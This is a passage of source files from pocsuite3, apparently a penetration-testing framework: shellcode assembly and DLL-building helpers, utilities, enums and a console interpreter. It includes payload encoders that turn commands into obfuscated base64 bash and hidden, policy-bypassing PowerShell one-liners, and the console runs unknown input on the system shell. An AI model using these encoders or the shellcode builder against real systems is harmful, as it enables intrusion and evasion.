OS_SYSTEM == OS.WINDOWS:\n app += '.exe'\n find_app = search_file(\"%s\" % app, paths.SHELLCODES_DEV_PATH)\n if find_app:\n if debug:\n print(\"app: '%s' found at %s\" % (app, find_app))\n else:\n print(\"You must install app: '%s' and maybe edit environment variables path to it\" % app)\n return None\n elif OS_SYSTEM == OS.LINUX:\n find_app = app\n else:\n print(\"Can't understand source os\")\n return None\n\n command = \"%s -f%s -o%s %s\" % (find_app, output_format, obj_file, asm_file)\n if debug:\n print(command)\n res = call([find_app, \"-f\", output_format, \"-o\", obj_file, asm_file])\n if res == 0:\n if debug:\n print(\"Objective code has been created\")\n return obj_file\n else:\n print(\"Something wrong while getting objective code\")\n return None\n\n\ndef objdump(obj_file, os_target_arch, debug=0):\n \"\"\"\n Get shellcode with objdump utility\n \"\"\"\n\n res = ''\n if not obj_file:\n print(\"You must specify some params passed to function\")\n return None\n else:\n app = 'objdump'\n if OS_SYSTEM == OS.WINDOWS:\n app += \".exe\"\n\n find_app = search_file(\"%s\" % app, paths.SHELLCODES_DEV_PATH)\n if find_app:\n if debug:\n print(\"app: '%s' found at %s\" % (app, find_app))\n else:\n print(\"You must install app: '%s' and maybe edit environment variables path to it\" % app)\n return None\n elif OS_SYSTEM == OS.LINUX:\n find_app = app\n else:\n print(\"Can't understand source os\")\n return None\n\n if os_target_arch == OS_ARCH.X86:\n p = Popen(['%s' % find_app, '-d', obj_file], stdout=PIPE, stderr=PIPE)\n elif os_target_arch == OS_ARCH.X64:\n p = Popen(['%s' % find_app, '-d', obj_file, '--disassembler-options=addr64'], stdout=PIPE, stderr=PIPE)\n else:\n print(\"OS TARGET ARCH '%s' is not supported\" % os_target_arch)\n return\n\n (stdout, stderr) = p.communicate()\n if p.returncode == 0:\n for line in stdout.splitlines():\n cols = line.split('\\t')\n if len(cols) >= 2:\n for b in [b for b in cols[1].split(' ') if b != '']:\n res = res + ('\\\\x%s' % b)\n else:\n raise ValueError(stderr)\n\n if res and debug:\n print(\"objdump is created\")\n\n return res\n\n\ndef create_shellcode(asm_code, os_target, os_target_arch, make_exe=0, debug=0, filename=\"\", dll_inj_funcs=[]):\n if os_target == OS.LINUX:\n dll_inj_funcs = []\n if not is_os_64bit() and os_target_arch == OS_ARCH.X64:\n print(\"ERR: can not create shellcode for this os_target_arch ({0}) on os_arch ({1})\".format(os_target_arch,\n OS_ARCH.X64))\n return None\n asm_file = write_file(asm_code, '.asm', filename)\n obj_file = get_objective_code(asm_file, os_target_arch, debug)\n\n # stage_2:\n if obj_file:\n shellcode = objdump(obj_file, os_target_arch, debug)\n shellcode = shellcode.replace('\\\\x', '').decode('hex')\n # shellcode = extract_shell_from_obj(obj_file)\n else:\n return None\n if make_exe:\n make_binary_from_obj(obj_file, os_target, os_target_arch, debug)\n if dll_inj_funcs:\n generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_funcs, debug)\n return shellcode, asm_file.split(\".\")[0]\n\n\ndef generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_funcs, debug):\n asm_code = asm_code.replace(\"global _start\", \"\").replace(\"_start:\", \"\")\n additional_code = \"\"\n for func in dll_inj_funcs:\n additional_code += \"global _{}\\r\\n\".format(func)\n for func in dll_inj_funcs:\n additional_code += \"_{}:\\r\\n\".format(func)\n asm_code = additional_code + asm_code\n asm_file = write_file(asm_code, '.asm', filename)\n obj_file = get_objective_code(asm_file, os_target_arch, debug)\n make_binary_from_obj(obj_file, os_target, os_target_arch, debug, True)\n\n\ndef make_binary_from_obj(o_file, os_target, os_target_arch, debug=0, is_dll=False):\n \"\"\"\n Function for test shellcode with app written on c-language\n \"\"\"\n if is_dll and os_target == OS.LINUX:\n print('Dll can be generated only for WINDOWS OS')\n return None\n app = 'ld'\n find_app = ''\n if OS_SYSTEM == OS.WINDOWS:\n if os_target == OS.LINUX:\n app += '.gold'\n elif os_target == OS.WINDOWS and os_target_arch == OS_ARCH.X64:\n app += '64'\n app += '.exe'\n find_app = search_file(\"%s\" % app, paths.SHELLCODES_DEV_PATH)\n if find_app:\n if debug:\n print(\"app: '%s' found at %s\" % (app, find_app))\n else:\n print(\"You must install app: '%s' and maybe edit environment variables path to it\" % app)\n return None\n elif OS_SYSTEM == OS.LINUX:\n find_app = app\n else:\n print(\"Can't understand source os: %s\" % OS_SYSTEM)\n return None\n\n c_exe = (o_file.split('.'))[0]\n commands_list = [find_app, '-o', c_exe, o_file, '--strip-all']\n if OS_SYSTEM == OS.LINUX:\n if os_target == OS.WINDOWS:\n commands_list.append('-m')\n commands_list.append('i386pe')\n if is_dll:\n commands_list.append('-shared')\n p = Popen(commands_list)\n p.communicate()\n elif OS_SYSTEM == OS.WINDOWS:\n if is_dll:\n commands_list.append('-shared')\n p = Popen(commands_list)\n p.communicate()\n else:\n print(\"ERR: source os (%s) is not supported\" % OS_SYSTEM)\n if os_target == OS.WINDOWS:\n newname = c_exe + '.dll' if is_dll else c_exe + '.exe'\n if os.path.exists(newname):\n os.remove(newname)\n os.rename(c_exe, newname)\n print(\"Complete. Now you can try to execute file: %s\" % c_exe)\n\n\ndef extract_shell_from_obj(file):\n with open(file, 'rb') as f:\n contents = f.read()\n flag = contents[4]\n if flag == '\\x01':\n length = struct.unpack('H', port)\n return struct.pack(' len(text):\n return text\n if char == text[-length:]:\n text = text[:-length]\n return text\n\n\ndef ltrim(text, char):\n \"\"\"\n Delete the specified character on the left\n :param text: str\n :param char: character\n :return:\n \"\"\"\n length = len(char)\n if length > len(text):\n return text\n if char == text[:length]:\n text = text[length:]\n return text\n\n\ndef index_modules(modules_directory):\n \"\"\" Returns list of all exploits modules\n\n :param str modules_directory: path to modules directory\n :return list: list of found modules\n \"\"\"\n\n modules = []\n for root, _, files in os.walk(modules_directory):\n files = filter(lambda x: not x.startswith(\"__\") and x.endswith(\".py\") or x.endswith(\".yaml\"), files)\n modules.extend(map(lambda x: os.path.join(root, os.path.splitext(x)[0]), files))\n\n return modules\n\n\ndef humanize_path(path: str) -> str:\n \"\"\" Replace python dotted path to directory-like one.\n\n ex. foo.bar.baz -> foo/bar/baz\n\n :param str path: path to humanize\n :return str: humanized path\n \"\"\"\n\n return path.replace(\".\", os.sep)\n\n\ndef pythonize_path(path: str) -> str:\n \"\"\" Replaces argument to valid python dotted notation.\n\n ex. foo/bar/baz -> foo.bar.baz\n\n :param str path: path to pythonize\n :return str: pythonized path\n \"\"\"\n\n return path.replace(os.sep, \".\")\n\n\ndef module_required(fn):\n \"\"\" Checks if module is loaded.\n\n Decorator that checks if any module is activated\n before executing command specific to modules (ex. 'run').\n \"\"\"\n\n @wraps(fn)\n def wrapper(self, *args, **kwargs):\n if not self.current_module:\n logger.error(\"You have to activate any module with 'use' command.\")\n return\n return fn(self, *args, **kwargs)\n\n try:\n name = \"module_required\"\n wrapper.__decorators__.append(name)\n except AttributeError:\n wrapper.__decorators__ = [name]\n return wrapper\n\n\ndef stop_after(space_number):\n \"\"\" Decorator that determines when to stop tab-completion\n\n Decorator that tells command specific complete function\n (ex. \"complete_use\") when to stop tab-completion.\n Decorator counts number of spaces (' ') in line in order\n to determine when to stop.\n\n ex. \"use exploits/dlink/specific_module \" -> stop complete after 2 spaces\n \"set rhost \" -> stop completing after 2 spaces\n \"run \" -> stop after 1 space\n\n :param space_number: number of spaces (' ') after which tab-completion should stop\n :return:\n \"\"\"\n\n def _outer_wrapper(wrapped_function):\n @wraps(wrapped_function)\n def _wrapper(self, *args, **kwargs):\n try:\n if args[1].count(\" \") == space_number:\n return []\n except Exception as err:\n logger.error(err)\n return wrapped_function(self, *args, **kwargs)\n\n return _wrapper\n\n return _outer_wrapper\n\n\ndef check_port(ip, port):\n res = socket.getaddrinfo(ip, port, socket.AF_UNSPEC, socket.SOCK_STREAM)\n af, sock_type, proto, canonname, sa = res[0]\n s = socket.socket(af, sock_type, proto)\n\n try:\n s.connect(sa)\n s.shutdown(2)\n return True\n except socket.error:\n return False\n finally:\n s.close()\n\n\ndef exec_cmd(cmd, raw_data=True):\n cmd = shlex.split(cmd)\n out_data = b''\n try:\n p = subprocess.Popen(\n cmd, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n while p.poll() is None:\n line = p.stdout.read()\n out_data += line\n except Exception as ex:\n logger.error(\"Execute cmd error {}\".format(str(ex)))\n\n encoding = chardet.detect(out_data).get('encoding')\n encoding = encoding if encoding else 'utf-8'\n if IS_WIN:\n out_data = out_data.split(b'\\r\\n\\r\\n')\n else:\n out_data = out_data.split(b'\\n\\n')\n if not raw_data:\n for i, data in enumerate(out_data):\n out_data[i] = data.decode(encoding, errors='ignore')\n\n return out_data\n\n\ndef mosaic(s):\n \"\"\" Replacing URL/IPv4/IPv6 Address with asterisk's\n\n eg. A.B.C.D -> *.*.C.D\n \"\"\"\n\n s = str(s)\n if not conf.get('ppt', False):\n return s\n\n scheme = ''\n t = s.split('://', 1)\n if len(t) > 1:\n scheme, s = f'{t[0]}://', t[1]\n\n # URL/IPv6\n if len(re.findall(r':', s)) >= 3:\n t = s.split(':')\n for i in range(1, len(t) - 2):\n if ']' in t[i]:\n break\n if t[i] != '':\n t[i] = '*'\n s = ':'.join(t)\n\n # URL/IPv4\n elif len(re.findall(r'\\.', s)) >= 3:\n t = s.split('.', 4)\n t[0] = t[1] = '*'\n s = '.'.join(t)\n\n elif '.' in s:\n t = s.split('.')\n for i in range(0, len(t) - 1):\n t[i] = '*'\n s = '.'.join(t)\n return scheme + s\n\n\ndef encoder_bash_payload(cmd: str) -> str:\n ret = \"bash -c '{echo,%s}|{base64,-d}|{bash,-i}'\" % base64.b64encode(cmd.encode()).decode()\n return ret\n\n\ndef encoder_powershell_payload(powershell: str):\n command = \"powershell -NonI -W Hidden -NoP -Exec Bypass -Enc \" + base64.b64encode(\n '\\x00'.join(list(powershell)).encode() + b'\\x00').decode()\n return command\n\n\ndef get_host_ipv6(dst='2001:db8::'):\n \"\"\" Fetches source ipv6 address when connect to dst\n\n Args:\n dst : target ip or domain\n\n Returns:\n : source ipv6 address\n \"\"\"\n\n s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n try:\n s.connect((dst, 1027))\n except socket.error:\n return None\n return s.getsockname()[0]\n\n\nclass OrderedSet(collections.OrderedDict, collectionsAbc.MutableSet):\n\n def add(self, e):\n self[e] = None\n\n def discard(self, e):\n self.pop(e, None)\n\n def __le__(self, other):\n return all(e in other for e in self)\n\n def __lt__(self, other):\n return self <= other and self != other\n\n def __ge__(self, other):\n return all(e in self for e in other)\n\n def __gt__(self, other):\n return self >= other and self != other\n\n def __repr__(self):\n return 'OrderedSet([%s])' % (', '.join(map(repr, self.keys())))\n\n def __str__(self):\n return '{%s}' % (', '.join(map(repr, self.keys())))\n\n\ndef get_file_text(filepath):\n with open(filepath, 'rb') as f:\n content = f.read()\n encoding = chardet.detect(content)['encoding'] or 'utf-8'\n return content.decode(encoding)\n\n\nif __name__ == '__main__':\n cmd = 'ping baidu.com'\n res = exec_cmd(cmd=cmd)\n print(res)\n" }, { "path": "pocsuite3/lib/core/convert.py", "content": "import sys\n\nfrom pocsuite3.lib.core.settings import IS_WIN\nfrom pocsuite3.lib.core.settings import UNICODE_ENCODING\n\n\ndef single_time_warn_message(message):\n \"\"\"\n Cross-linked function\n \"\"\"\n sys.stdout.write(message)\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n\ndef stdout_encode(data):\n ret = None\n\n try:\n data = data or \"\"\n\n # Reference: http://bugs.python.org/issue1602\n if IS_WIN:\n output = data.encode(sys.stdout.encoding, \"replace\")\n\n if '?' in output and '?' not in data:\n warn_msg = \"cannot properly display Unicode characters \"\n warn_msg += \"inside Windows OS command prompt \"\n warn_msg += \"(http://bugs.python.org/issue1602). All \"\n warn_msg += \"unhandled occurances will result in \"\n warn_msg += \"replacement with '?' character. Please, find \"\n warn_msg += \"proper character representation inside \"\n warn_msg += \"corresponding output files. \"\n single_time_warn_message(warn_msg)\n\n ret = output\n else:\n ret = data.encode(sys.stdout.encoding)\n except Exception:\n ret = data.encode(UNICODE_ENCODING) if isinstance(data, str) else data\n\n return ret\n" }, { "path": "pocsuite3/lib/core/data.py", "content": "from pocsuite3.lib.core.datatype import AttribDict\nfrom pocsuite3.lib.core.log import LOGGER\n\n# logger\nlogger = LOGGER\n\n# object to share within function and classes command\n# line options and settings\nconf = AttribDict()\n\n# Dictionary storing\n# (1)targets, (2)registeredPocs, (3) bruteMode\n# (4)results, (5)pocFiles\n# (6)multiThreadMode \\ threadContinue \\ threadException\nkb = AttribDict()\n\n# object to store original command line options\ncmd_line_options = AttribDict()\n\n# object to store merged options (command line, configuration file and default options)\nmerged_options = AttribDict()\n\n# pocsuite paths\npaths = AttribDict()\n" }, { "path": "pocsuite3/lib/core/datatype.py", "content": "from collections import OrderedDict\n\n\nclass AttribDict(OrderedDict):\n \"\"\"\n AttrDict extends OrderedDict to provide attribute-style access.\n Items starting with __ or _OrderedDict__ can't be accessed as attributes.\n \"\"\"\n __exclude_keys__ = set()\n\n def __getattr__(self, name):\n if (name.startswith('__')\n or name.startswith('_OrderedDict__')\n or name in self.__exclude_keys__):\n return super(AttribDict, self).__getattribute__(name)\n else:\n try:\n return self[name]\n except KeyError:\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n if (name.startswith('__')\n or name.startswith('_OrderedDict__')\n or name in self.__exclude_keys__):\n return super(AttribDict, self).__setattr__(name, value)\n self[name] = value\n\n def __delattr__(self, name):\n if (name.startswith('__')\n or name.startswith('_OrderedDict__')\n or name in self.__exclude_keys__):\n return super(AttribDict, self).__delattr__(name)\n del self[name]\n" }, { "path": "pocsuite3/lib/core/decorators.py", "content": "import hashlib\n\n\ndef cachedmethod(f, cache={}):\n \"\"\"\n Method with a cached content\n Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/\n \"\"\"\n\n def _(*args, **kwargs):\n key_string = \"|\".join(str(_) for _ in (f, args, kwargs)).encode()\n key = int(hashlib.md5(key_string).hexdigest(), 16) & 0x7fffffffffffffff\n if key not in cache:\n cache[key] = f(*args, **kwargs)\n\n return cache[key]\n\n return _\n" }, { "path": "pocsuite3/lib/core/docker_env.py", "content": "from io import BytesIO\nfrom docker import client\nfrom docker import errors\n\n\nfrom pocsuite3.lib.core.data import logger\n\n\nclass DockerEnv:\n\n def __init__(self):\n self.client = client.from_env()\n\n def build(self, name, docker_file):\n file_obj = BytesIO(docker_file.encode())\n try:\n logger.info(\"Building image...\")\n build_info = self.client.images.build(fileobj=file_obj, tag=name)\n return build_info\n except errors.BuildError as e:\n logger.error(e)\n\n def run(self, tag_name, docker_file, ports, envs, volumes):\n try:\n # if image exists run\n self.client.images.get(tag_name)\n logger.info(\"Image {} exists\".format(tag_name))\n run_info = self.client.containers.run(\n tag_name,\n detach=True,\n ports=ports,\n environment=envs,\n volumes=volumes\n )\n return run_info\n except errors.ImageNotFound:\n # if image not exists, build image first\n logger.info(\"Image {} does not exist\".format(tag_name))\n build_info = self.build(tag_name, docker_file)\n if build_info[0].tags:\n run_info = self.client.containers.run(\n tag_name,\n detach=True,\n ports=ports,\n environment=envs,\n volumes=volumes\n )\n return run_info\n\n\nif __name__ == \"__main__\":\n docker_env = DockerEnv()\n ports = {\"8080/tcp\": '8899', '8090/tcp': (\"127.0.0.1\", 8890)}\n env = [\"PORT=8899\", \"PORT=8890\"]\n volumes = [\"/tmp:/home\"]\n dockerfile = \"FROM ubuntu:latest\"\n image_tag = \"ubuntu:pocsuite\"\n docker_env.run(\n image_tag,\n docker_file=dockerfile,\n ports=ports,\n envs=env,\n volumes=volumes\n )\n" }, { "path": "pocsuite3/lib/core/enums.py", "content": "from pocsuite3.lib.core.datatype import AttribDict\n\n\nclass LOGGING_LEVELS:\n NOTSET = 0\n DEBUG = 10\n INFO = 20\n WARNING = 30\n ERROR = 40\n CRITICAL = 50\n\n\nclass CUSTOM_LOGGING:\n SYSINFO = 21\n SUCCESS = 22\n ERROR = 23\n WARNING = 24\n\n\nclass OUTPUT_STATUS:\n SUCCESS = 1\n FAILED = 0\n\n\nclass HTTP_HEADER:\n ACCEPT = \"Accept\"\n ACCEPT_CHARSET = \"Accept-Charset\"\n ACCEPT_ENCODING = \"Accept-Encoding\"\n ACCEPT_LANGUAGE = \"Accept-Language\"\n AUTHORIZATION = \"Authorization\"\n CACHE_CONTROL = \"Cache-Control\"\n CONNECTION = \"Connection\"\n CONTENT_ENCODING = \"Content-Encoding\"\n CONTENT_LENGTH = \"Content-Length\"\n CONTENT_RANGE = \"Content-Range\"\n CONTENT_TYPE = \"Content-Type\"\n COOKIE = \"Cookie\"\n EXPIRES = \"Expires\"\n HOST = \"Host\"\n IF_MODIFIED_SINCE = \"If-Modified-Since\"\n LAST_MODIFIED = \"Last-Modified\"\n LOCATION = \"Location\"\n PRAGMA = \"Pragma\"\n PROXY_AUTHORIZATION = \"Proxy-Authorization\"\n PROXY_CONNECTION = \"Proxy-Connection\"\n RANGE = \"Range\"\n REFERER = \"Referer\"\n REFRESH = \"Refresh\" # Reference: http://stackoverflow.com/a/283794\n SERVER = \"Server\"\n SET_COOKIE = \"Set-Cookie\"\n TRANSFER_ENCODING = \"Transfer-Encoding\"\n URI = \"URI\"\n USER_AGENT = \"User-Agent\"\n VIA = \"Via\"\n X_POWERED_BY = \"X-Powered-By\"\n X_DATA_ORIGIN = \"X-Data-Origin\"\n\n\nclass PROXY_TYPE:\n HTTP = \"HTTP\"\n HTTPS = \"HTTPS\"\n SOCKS4 = \"SOCKS4\"\n SOCKS5 = \"SOCKS5\"\n SOCKS5H = \"SOCKS5H\"\n\n\nclass ERROR_TYPE_ID:\n NOTIMPLEMENTEDERROR = 2\n CONNECTIONERROR = 3.0\n HTTPERROR = 3.1\n CONNECTTIMEOUT = 3.2\n TOOMANYREDIRECTS = 3.3\n OTHER = 4\n\n\nclass OS:\n LINUX = \"linux\"\n WINDOWS = \"windows\"\n\n\nclass OS_ARCH:\n X86 = \"32bit\"\n X64 = \"64bit\"\n\n\nclass ENCODER_TPYE:\n XOR = \"xor\"\n ALPHANUMERIC = \"alphanum\"\n ROT_13 = \"rot_13\"\n FNSTENV_XOR = \"fnstenv\"\n JUMPCALL_XOR = \"jumpcall\"\n\n\nclass SHELLCODE_TYPE:\n JSP = \"jsp\"\n JAR = \"jar\"\n WAR = \"war\"\n PYTHON = \"python\"\n PHP = \"php\"\n ASPX = \"aspx\"\n\n\nclass SHELLCODE_CONNECTION:\n BIND = 'bind'\n REVERSE = 'reverse'\n\n\nclass PLUGIN_TYPE:\n TARGETS = 'targets'\n POCS = 'pocs'\n RESULTS = 'results'\n\n\nclass AUTOCOMPLETE_TYPE:\n SQL = 0\n OS = 1\n POCSUITE = 2\n API = 3\n CONSOLE = 4\n\n\nclass POC_CATEGORY:\n EXPLOITS = AttribDict()\n EXPLOITS.WEBAPP = 'WebApp'\n EXPLOITS.DOS = 'DoS'\n EXPLOITS.REMOTE = 'Remote'\n EXPLOITS.LOCAL = 'Local'\n\n TOOLS = AttribDict()\n TOOLS.CRACK = 'Crack'\n\n PROTOCOL = AttribDict()\n PROTOCOL.HTTP = \"Http\"\n PROTOCOL.FTP = \"Ftp\"\n PROTOCOL.SSH = \"Ssh\"\n PROTOCOL.TELNET = \"Telnet\"\n PROTOCOL.REDIS = \"Redis\"\n PROTOCOL.SMTP = 'SMTP'\n PROTOCOL.DNS = 'DNS'\n PROTOCOL.SNMP = 'SNMP'\n PROTOCOL.SMB = 'SMB'\n PROTOCOL.MQTT = 'MQTT'\n PROTOCOL.MYSQL = 'MySQL'\n PROTOCOL.RDP = 'RDP'\n PROTOCOL.UPNP = 'UPnP'\n PROTOCOL.AJP = 'AJP'\n PROTOCOL.XMPP = 'XMPP'\n PROTOCOL.WINBOX = 'Winbox'\n PROTOCOL.MEMCACHED = 'Memcached'\n PROTOCOL.BACNET = 'BACnet'\n PROTOCOL.T3 = 'T3'\n\n\nclass OPTION_TYPE:\n BOOLEAN = \"boolean\"\n INTEGER = \"integer\"\n FLOAT = \"float\"\n STRING = \"string\"\n\n\nclass VUL_TYPE:\n BACKDOOR = 'Backdoor'\n INSECURE_COOKIE_HANDLING = 'Insecure Cookie Handling'\n CSRF = 'CSRF'\n XSS = 'XSS'\n UXSS = 'UXSS'\n SSRF = 'Server-Side Request Forgery'\n SHELLCODE = 'ShellCode'\n SQL_INJECTION = 'SQL Injection'\n ARBITRARY_FILE_DOWNLOAD = 'Arbitrary File Download'\n ARBITRARY_FILE_CREATION = 'Arbitrary File Creation'\n ARBITRARY_FILE_DELETION = 'Arbitrary File Deletion'\n ARBITRARY_FILE_READ = 'Arbitrary File Read'\n OTHER = 'Other'\n VARIABLE_COVERAGE = 'Variable Coverage'\n COMMAND_EXECUTION = 'Command Execution'\n INJECTING_MALWARE_CODES = 'Injecting Malware Codes'\n WEAK_PASSWORD = 'Weak Password'\n DENIAL_OF_SERVICE = 'Denial Of service'\n DATABASE_FOUND = 'Database Found'\n UPLOAD_FILES = 'Upload Files'\n LOCAL_OVERFLOW = 'Local Overflow'\n PRIVILEGE_ESCALATION = 'Privilege Escalation'\n INFORMATION_DISCLOSURE = 'Information Disclosure'\n LOGIN_BYPASS = 'Login Bypass'\n PATH_TRAVERSAL = 'Path Traversal'\n RESOLVE_ERROR = 'Resolve Error'\n UNAUTHORIZED_ACCESS = 'Unauthorized Access'\n PATH_DISCLOSURE = 'Path Disclosure'\n CODE_EXECUTION = 'Code Execution'\n REMOTE_PASSWORD_CHANGE = 'Remote Password Change'\n REMOTE_OVERFLOW = 'Remote Overflow'\n DIRECTORY_LISTING = 'Directory Listing'\n NULL_BYTE_INJECTION = 'Null Byte Injection'\n MAN_IN_THE_MIDDLE = 'Man-in-the-middle'\n FORMAT_STRING = 'Format String'\n BUFFER_OVERFLOW = 'Buffer Overflow'\n CRLF_INJECTION = 'CRLF Injection'\n XML_INJECTION = 'XML Injection'\n LOCAL_FILE_INCLUSION = 'Local File Inclusion'\n REMOTE_FILE_INCLUSION = 'Remote File Inclusion'\n CREDENTIAL_PREDICTION = 'Credential Prediction'\n HTTP_PARAMETER_POLLUTION = 'HTTP Parameter Pollution'\n HTTP_REQUEST_SPLITTING = 'HTTP Request Splitting'\n HTTP_RESPONSE_SPLITTING = 'HTTP Response Splitting'\n HTTP_RESPONSE_SMUGGLING = 'HTTP Response Smuggling'\n HTTP_REQUEST_SMUGGLING = 'HTTP Request Smuggling'\n SSI_INJECTION = 'SSI Injection'\n OUT_OF_MEMORY = 'Out of Memory'\n INTEGER_OVERFLOWS = 'Integer Overflows'\n CONTENT_SPOOFING = 'Content Spoofing'\n XQUERY_INJECTION = 'XQuery Injection'\n BUFFER_OVER_READ = 'Buffer Over-read'\n BRUTE_FORCE = 'Brute Force'\n LDAP_INJECTION = 'LDAP Injection'\n SECURITY_MODE_BYPASS = 'Security Mode Bypass'\n BACKUP_FILE_FOUND = 'Backup File Found'\n XPATH_INJECTION = 'XPath Injection'\n URL_REDIRECTOR_ABUSE = 'URL Redirector Abuse'\n CODE_DISCLOSURE = 'Code Disclosure'\n USE_AFTER_FREE = 'Use After Free'\n DNS_HIJACKING = 'DNS Hijacking'\n IMPROPER_INPUT_VALIDATION = 'Improper Input Validation'\n UAF = 'Use After Free'\n" }, { "path": "pocsuite3/lib/core/exception.py", "content": "from http.client import HTTPException\n\n\nclass PocsuiteBaseException(Exception):\n pass\n\n\nclass PocsuiteUserQuitException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteShellQuitException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteDataException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteGenericException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteSystemException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteFilePathException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteConnectionException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteThreadException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteValueException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteMissingPrivileges(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteSyntaxException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteValidationException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteMissingMandatoryOptionException(PocsuiteBaseException):\n pass\n\n\nclass PocsuitePluginBaseException(PocsuiteBaseException):\n pass\n\n\nclass PocsuitePluginDorkException(PocsuitePluginBaseException):\n pass\n\n\nclass PocsuiteHeaderTypeException(PocsuiteBaseException):\n pass\n\n\nclass PocsuiteIncompleteRead(HTTPException):\n def __init__(self, partial, expected=None):\n self.args = partial,\n self.partial = partial\n self.expected = expected\n\n def __repr__(self):\n if self.expected is not None:\n e = ', %i more expected' % self.expected\n else:\n e = ''\n return '%s(%i bytes read%s)' % (self.__class__.__name__,\n len(self.partial), e)\n\n def __str__(self):\n return repr(self)\n" }, { "path": "pocsuite3/lib/core/interpreter.py", "content": "# pylint: disable=E0202\nimport os\nimport re\nimport chardet\nimport prettytable\nfrom termcolor import colored\n\nfrom pocsuite3.lib.controller.controller import start\nfrom pocsuite3.lib.core.common import banner, index_modules, data_to_stdout, module_required, \\\n get_poc_name, stop_after, get_local_ip, is_ipv6_address_format, rtrim, ltrim, exec_cmd, get_file_text\nfrom pocsuite3.lib.core.data import logger, paths, kb, conf\nfrom pocsuite3.lib.core.enums import POC_CATEGORY, AUTOCOMPLETE_TYPE\nfrom pocsuite3.lib.core.exception import PocsuiteBaseException, PocsuiteShellQuitException\nfrom pocsuite3.lib.core.option import _set_listener, _set_http_referer, _set_http_user_agent, _set_network_proxy, \\\n _set_network_timeout\nfrom pocsuite3.lib.core.register import load_file_to_module\nfrom pocsuite3.lib.core.settings import IS_WIN\nfrom pocsuite3.lib.core.shell import auto_completion, readline\n\n\nclass BaseInterpreter(object):\n global_help = \"\"\n\n def __init__(self):\n self.setup()\n self.banner = \"\"\n self.complete = None\n # Prepare to execute system commands\n self.input_command = ''\n self.input_args = ''\n\n def setup(self):\n \"\"\" Initialization of third-party libraries\n\n Setting interpreter history.\n Setting appropriate completer function.\n\n :return:\n \"\"\"\n auto_completion(completion=AUTOCOMPLETE_TYPE.CONSOLE, console=self.complete)\n\n def parse_line(self, line):\n \"\"\" Split line into command and argument.\n\n :param line: line to parse\n :return: (command, argument)\n \"\"\"\n command, _, arg = line.strip().partition(\" \")\n return command, arg.strip()\n\n @property\n def prompt(self):\n \"\"\" Returns prompt string \"\"\"\n return \">>>\"\n\n def get_command_handler(self, command):\n \"\"\" Parsing command and returning appropriate handler.\n\n :param command: command\n :return: command_handler\n \"\"\"\n try:\n command_handler = getattr(self, \"command_{}\".format(command))\n except AttributeError:\n cmd = self.input_command + ' ' + self.input_args\n for line in exec_cmd(cmd=cmd):\n result_encoding = chardet.detect(line)['encoding']\n if result_encoding:\n print(line.decode(result_encoding))\n raise PocsuiteBaseException(\"Pocsuite3 Unknown this command, and run it on system: '{}'\".format(command))\n\n return command_handler\n\n def start(self):\n \"\"\" Routersploit main entry point. Starting interpreter loop. \"\"\"\n\n while True:\n try:\n '''\n # BUG\n https://github.com/knownsec/pocsuite3/issues/317\n https://stackoverflow.com/questions/52102240/how-to-apply-coloring-formatting-to-the-displayed-text-in-input-function-simi\n\n colorama works by replacing sys.stdout and sys.stderr with versions that interpret ISO 6429 sequences,\n make appropriate Win32 calls to implement them,\n and send the rest of the characters on to the underlying stream.\n This explains your observations: input doesn’t use the Python-level sys.stdout.write,\n and Spyder interprets the sequences itself but is unaffected by the Win32 calls.\n\n The only reasonable fix seems to be to use input with no prompt :(\n '''\n self.input_command, self.input_args = self.parse_line(input(self.prompt))\n command = self.input_command.lower()\n if not command:\n continue\n command_handler = self.get_command_handler(command)\n command_handler(self.input_args)\n except PocsuiteBaseException as warn:\n logger.warn(warn)\n except EOFError:\n logger.info(\"Pocsuite3 stopped\")\n break\n except KeyboardInterrupt:\n logger.warn('Interrupt: use the \\'exit\\' command to quit')\n continue\n\n def complete(self, text, state):\n \"\"\"Return the next possible completion for 'text'.\n\n If a command has not been entered, then complete against command list.\n Otherwise try to call complete_ to get list of completions.\n \"\"\"\n if state == 0:\n original_line = readline.get_line_buffer()\n line = original_line.lstrip()\n stripped = len(original_line) - len(line)\n start_index = readline.get_begidx() - stripped\n end_index = readline.get_endidx() - stripped\n\n if start_index > 0:\n cmd, args = self.parse_line(line)\n if cmd == \"\":\n complete_function = self.default_completer\n else:\n try:\n complete_function = getattr(self, \"complete_\" + cmd)\n except AttributeError:\n complete_function = self.default_completer\n else:\n complete_function = self.raw_command_completer\n\n self.completion_matches = complete_function(text, line, start_index, end_index)\n\n try:\n return self.completion_matches[state]\n except IndexError:\n return None\n\n def commands(self, *ignored):\n \"\"\" Returns full list of interpreter commands.\n\n :param ignored:\n :return: full list of interpreter commands\n \"\"\"\n return [command.rsplit(\"_\").pop() for command in dir(self) if command.startswith(\"command_\")]\n\n def raw_command_completer(self, text, line, start_index, end_index):\n \"\"\" Complete command w/o any argument \"\"\"\n return [command for command in self.suggested_commands() if command.startswith(text)]\n\n def default_completer(self, *ignored):\n return []\n\n def suggested_commands(self):\n \"\"\" Entry point for intelligent tab completion.\n\n Overwrite this method to suggest suitable commands.\n\n :return: list of suitable commands\n \"\"\"\n return self.commands()\n\n\nclass PocsuiteInterpreter(BaseInterpreter):\n global_help = \"\"\"Global commands:\n help Print this help menu\n use Select a module for usage\n search Search for appropriate module\n list|show all Show all available pocs\n clear clear the console screen\n exit Exit Pocsuite3\"\"\"\n\n module_help = \"\"\"Module commands:\n run Run the selected module with the given options\n back De-select the current module\n set